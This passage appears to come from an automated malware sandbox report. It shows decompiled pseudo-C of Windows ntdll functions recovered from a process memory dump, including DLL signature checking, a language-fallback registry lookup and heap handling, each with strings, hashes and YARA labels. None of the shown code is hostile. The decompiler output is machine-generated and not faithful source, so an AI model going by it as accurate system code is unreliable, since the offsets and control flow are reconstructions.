					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E011FC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x12e5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01275510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x12e5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01217D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01217D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01277016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01217D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01217D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01277016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0122A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E011FB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                0x01207e4c
                                                                                                                0x01207e50
                                                                                                                0x01207e55
                                                                                                                0x01207e58
                                                                                                                0x01207e5d
                                                                                                                0x01207e71
                                                                                                                0x01207f33
                                                                                                                0x01207e77
                                                                                                                0x01207e77
                                                                                                                0x01207e79
                                                                                                                0x01207e79
                                                                                                                0x01207e7e
                                                                                                                0x01207f45
                                                                                                                0x01259848
                                                                                                                0x00000000
                                                                                                                0x01259848
                                                                                                                0x01207f4e
                                                                                                                0x01207f53
                                                                                                                0x01207f5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0125985a
                                                                                                                0x01259862
                                                                                                                0x01259866
                                                                                                                0x00000000
                                                                                                                0x0125986c
                                                                                                                0x00000000
                                                                                                                0x0125986c
                                                                                                                0x01207e84
                                                                                                                0x01207e84
                                                                                                                0x01207e8d
                                                                                                                0x01259871
                                                                                                                0x01207eb8
                                                                                                                0x01207ec0
                                                                                                                0x01207ec0
                                                                                                                0x01207e9a
                                                                                                                0x0125987e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01259884
                                                                                                                0x0125988b
                                                                                                                0x012598a7
                                                                                                                0x012598ac
                                                                                                                0x012598b1
                                                                                                                0x012598b6
                                                                                                                0x012598b8
                                                                                                                0x012598b8
                                                                                                                0x012598b9
                                                                                                                0x00000000
                                                                                                                0x012598b9
                                                                                                                0x01207ea0
                                                                                                                0x01207ea7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01207eac
                                                                                                                0x01207eb1
                                                                                                                0x01207ec6
                                                                                                                0x01207ed0
                                                                                                                0x012598cc
                                                                                                                0x01207ed6
                                                                                                                0x01207ed6
                                                                                                                0x01207ed6
                                                                                                                0x01207ede
                                                                                                                0x01207ee3
                                                                                                                0x012598e3
                                                                                                                0x012598f0
                                                                                                                0x01259902
                                                                                                                0x012598f2
                                                                                                                0x012598fb
                                                                                                                0x012598fb
                                                                                                                0x01259907
                                                                                                                0x0125991d
                                                                                                                0x0125991d
                                                                                                                0x01259907
                                                                                                                0x012598e3
                                                                                                                0x01207ef0
                                                                                                                0x01207f14
                                                                                                                0x01207f14
                                                                                                                0x01207f1e
                                                                                                                0x01259946
                                                                                                                0x01207f24
                                                                                                                0x01207f24
                                                                                                                0x01207f24
                                                                                                                0x01207f2c
                                                                                                                0x0125996a
                                                                                                                0x01259975
                                                                                                                0x01259975
                                                                                                                0x0125997e
                                                                                                                0x01259993
                                                                                                                0x01259993
                                                                                                                0x0125997e
                                                                                                                0x00000000
                                                                                                                0x01207ef2
                                                                                                                0x01207efc
                                                                                                                0x01207f0a
                                                                                                                0x01207f0e
                                                                                                                0x01259933
                                                                                                                0x00000000
                                                                                                                0x01259933
                                                                                                                0x00000000
                                                                                                                0x01207f0e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01207eb1

                                                                                                                Strings
                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01259891
                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 012598A2
                                                                                                                • LdrpCompleteMapModule, xrefs: 01259898
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                • API String ID: 0-1676968949
                                                                                                                • Opcode ID: 0314521dbaba69ce46b4bd20432b195a6c4c5eaf7d56094ec0146cb2621bf056
                                                                                                                • Instruction ID: 81262e1e3ac7d9f82b277c3cbd585621e231ff7e5d02a6d3042c13d62e7f08d3
                                                                                                                • Opcode Fuzzy Hash: 0314521dbaba69ce46b4bd20432b195a6c4c5eaf7d56094ec0146cb2621bf056
                                                                                                                • Instruction Fuzzy Hash: 1C511231621746DBEB22CB6CC988B2A7BF4AF00318F140699EA919B7D2D774FD40C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 011FE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E011FE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E011FF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E012395D0();
						}
						if(_t78 != 0) {
							L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0123FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0123BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01239600();
					if(_t97 < 0) {
						goto L6;
					}
					E0123BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L011FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0123BB40(_t83, _t102 + 0x24, _t78);
								if(L012043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0123BB40(_t84, _t102 + 0x24, _t94);
									if(L012043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                0x011fe620
                                                                                                                0x011fe628
                                                                                                                0x011fe62f
                                                                                                                0x011fe631
                                                                                                                0x011fe635
                                                                                                                0x011fe637
                                                                                                                0x011fe63e
                                                                                                                0x01255503
                                                                                                                0x01255503
                                                                                                                0x011fe64c
                                                                                                                0x011fe64c
                                                                                                                0x011fe651
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x011fe661
                                                                                                                0x011fe665
                                                                                                                0x0125542a
                                                                                                                0x011fe715
                                                                                                                0x011fe71a
                                                                                                                0x011fe71c
                                                                                                                0x011fe720
                                                                                                                0x011fe720
                                                                                                                0x011fe727
                                                                                                                0x011fe736
                                                                                                                0x011fe736
                                                                                                                0x011fe743
                                                                                                                0x011fe743
                                                                                                                0x011fe673
                                                                                                                0x011fe678
                                                                                                                0x011fe67d
                                                                                                                0x011fe682
                                                                                                                0x011fe685
                                                                                                                0x011fe692
                                                                                                                0x011fe69b
                                                                                                                0x011fe6a3
                                                                                                                0x011fe6ad
                                                                                                                0x011fe6b1
                                                                                                                0x011fe6b2
                                                                                                                0x011fe6bb
                                                                                                                0x011fe6bf
                                                                                                                0x011fe6c0
                                                                                                                0x011fe6c8
                                                                                                                0x011fe6cc
                                                                                                                0x011fe6d5
                                                                                                                0x011fe6d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x011fe6e5
                                                                                                                0x011fe6ea
                                                                                                                0x011fe6f9
                                                                                                                0x011fe70b
                                                                                                                0x011fe70f
                                                                                                                0x01255439
                                                                                                                0x0125545e
                                                                                                                0x0125545e
                                                                                                                0x00000000
                                                                                                                0x0125545e
                                                                                                                0x0125543b
                                                                                                                0x0125543e
                                                                                                                0x01255440
                                                                                                                0x01255445
                                                                                                                0x01255472
                                                                                                                0x01255475
                                                                                                                0x0125548d
                                                                                                                0x01255493
                                                                                                                0x012554a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012554ab
                                                                                                                0x012554b4
                                                                                                                0x012554bc
                                                                                                                0x012554c8
                                                                                                                0x012554de
                                                                                                                0x012554fb
                                                                                                                0x012554e0
                                                                                                                0x012554e6
                                                                                                                0x012554eb
                                                                                                                0x012554eb
                                                                                                                0x012554de
                                                                                                                0x00000000
                                                                                                                0x012554bc
                                                                                                                0x01255477
                                                                                                                0x0125547a
                                                                                                                0x01255480
                                                                                                                0x01255483
                                                                                                                0x01255486
                                                                                                                0x0125548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0125548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01255447
                                                                                                                0x01255447
                                                                                                                0x01255447
                                                                                                                0x01255447
                                                                                                                0x0125544e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01255450
                                                                                                                0x01255452
                                                                                                                0x01255455
                                                                                                                0x0125545a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0125545c
                                                                                                                0x0125546a
                                                                                                                0x0125546d
                                                                                                                0x0125546f
                                                                                                                0x00000000
                                                                                                                0x0125546f
                                                                                                                0x011fe70f

                                                                                                                Strings
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 011FE68C
                                                                                                                • InstallLanguageFallback, xrefs: 011FE6DB
                                                                                                                • @, xrefs: 011FE6C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                • API String ID: 0-1757540487
                                                                                                                • Opcode ID: 096aa2c8215a490dae8cd95c5bd88969dd9df9ba3372ab643ad5d49b51d7a562
                                                                                                                • Instruction ID: be3a6a3ab04172371386a384dc79326a3032a002cd3ff4c7c204b9fecabca152
                                                                                                                • Opcode Fuzzy Hash: 096aa2c8215a490dae8cd95c5bd88969dd9df9ba3372ab643ad5d49b51d7a562
                                                                                                                • Instruction Fuzzy Hash: A751D4B26153469BD718DF28C480A7BB7E8FF98614F05092EFA85D7250F734D904C792
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012BE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E012BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E012BBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E012BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E012BAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01239730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E012BA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E012BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01239730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E012BA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E012BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01212280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0120B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0120FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01217D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E012AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                0x012be547
                                                                                                                0x012be549
                                                                                                                0x012be54f
                                                                                                                0x012be553
                                                                                                                0x012be557
                                                                                                                0x012be55a
                                                                                                                0x012be55c
                                                                                                                0x012be55f
                                                                                                                0x012be561
                                                                                                                0x012be567
                                                                                                                0x012be56b
                                                                                                                0x012be7e2
                                                                                                                0x00000000
                                                                                                                0x012be571
                                                                                                                0x012be575
                                                                                                                0x012be577
                                                                                                                0x012be57b
                                                                                                                0x012be57c
                                                                                                                0x012be57d
                                                                                                                0x012be57e
                                                                                                                0x012be57f
                                                                                                                0x012be588
                                                                                                                0x012be58f
                                                                                                                0x012be591
                                                                                                                0x012be592
                                                                                                                0x012be592
                                                                                                                0x012be596
                                                                                                                0x012be59e
                                                                                                                0x012be5a0
                                                                                                                0x012be5a6
                                                                                                                0x012be61d
                                                                                                                0x012be61d
                                                                                                                0x012be621
                                                                                                                0x012be623
                                                                                                                0x012be630
                                                                                                                0x012be630
                                                                                                                0x012be7e6
                                                                                                                0x012be7eb
                                                                                                                0x012be7ed
                                                                                                                0x012be7f4
                                                                                                                0x012be7fa
                                                                                                                0x012be7ff
                                                                                                                0x012be7ff
                                                                                                                0x012be80a
                                                                                                                0x012be812
                                                                                                                0x012be812
                                                                                                                0x012be5ab
                                                                                                                0x012be5b4
                                                                                                                0x012be5b9
                                                                                                                0x012be5be
                                                                                                                0x012be5c0
                                                                                                                0x012be5c2
                                                                                                                0x012be5c8
                                                                                                                0x012be5c9
                                                                                                                0x012be5cb
                                                                                                                0x012be5cc
                                                                                                                0x012be5d5
                                                                                                                0x012be5e4
                                                                                                                0x012be5f1
                                                                                                                0x012be5f8
                                                                                                                0x012be5f8
                                                                                                                0x012be5d5
                                                                                                                0x012be602
                                                                                                                0x012be616
                                                                                                                0x012be63d
                                                                                                                0x012be644
                                                                                                                0x012be64d
                                                                                                                0x012be652
                                                                                                                0x012be657
                                                                                                                0x012be659
                                                                                                                0x012be65b
                                                                                                                0x012be661
                                                                                                                0x012be662
                                                                                                                0x012be664
                                                                                                                0x012be665
                                                                                                                0x012be66e
                                                                                                                0x012be67d
                                                                                                                0x012be68a
                                                                                                                0x012be691
                                                                                                                0x012be691
                                                                                                                0x012be66e
                                                                                                                0x012be6b0
                                                                                                                0x00000000
                                                                                                                0x012be6b6
                                                                                                                0x012be6bd
                                                                                                                0x012be6c7
                                                                                                                0x012be6d7
                                                                                                                0x012be6d9
                                                                                                                0x012be6db
                                                                                                                0x012be6de
                                                                                                                0x012be6e3
                                                                                                                0x012be6f3
                                                                                                                0x012be6fc
                                                                                                                0x012be700
                                                                                                                0x012be700
                                                                                                                0x012be704
                                                                                                                0x012be70a
                                                                                                                0x012be70a
                                                                                                                0x012be713
                                                                                                                0x012be716
                                                                                                                0x012be719
                                                                                                                0x012be720
                                                                                                                0x012be761
                                                                                                                0x012be76b
                                                                                                                0x012be774
                                                                                                                0x012be77a
                                                                                                                0x012be77a
                                                                                                                0x012be78a
                                                                                                                0x012be791
                                                                                                                0x012be799
                                                                                                                0x012be79b
                                                                                                                0x012be79f
                                                                                                                0x012be7aa
                                                                                                                0x012be7c0
                                                                                                                0x012be7ac
                                                                                                                0x012be7b2
                                                                                                                0x012be7b9
                                                                                                                0x012be7b9
                                                                                                                0x012be7c7
                                                                                                                0x012be806
                                                                                                                0x00000000
                                                                                                                0x012be7c9
                                                                                                                0x012be7d1
                                                                                                                0x012be7d8
                                                                                                                0x00000000
                                                                                                                0x012be7d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be722
                                                                                                                0x012be72e
                                                                                                                0x012be748
                                                                                                                0x012be74c
                                                                                                                0x012be754
                                                                                                                0x012be756
                                                                                                                0x012be75c
                                                                                                                0x012be75c
                                                                                                                0x00000000
                                                                                                                0x012be75c
                                                                                                                0x012be758
                                                                                                                0x012be758
                                                                                                                0x00000000
                                                                                                                0x012be758
                                                                                                                0x012be750
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be752
                                                                                                                0x00000000
                                                                                                                0x012be752
                                                                                                                0x012be730
                                                                                                                0x012be735
                                                                                                                0x012be73d
                                                                                                                0x012be73f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be741
                                                                                                                0x012be741
                                                                                                                0x00000000
                                                                                                                0x012be741
                                                                                                                0x012be739
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be73b
                                                                                                                0x00000000
                                                                                                                0x012be73b
                                                                                                                0x012be722
                                                                                                                0x012be720
                                                                                                                0x012be6b0
                                                                                                                0x012be618
                                                                                                                0x00000000
                                                                                                                0x012be618

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction ID: f945207935f7855962fb97d00ed16d95dead597e0e8fe1e0e920775933f5663f
                                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction Fuzzy Hash: 9491B3712243429FE724CE29C881BABBBE5FF84754F15892DF695CB281E774E804CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012751BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E012751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x12d05f0);
				E0124D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0120EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E012753CA(0);
						return E0124D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0123F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01213690(1, _t117, 0x11d1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0123AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01214620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0123AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
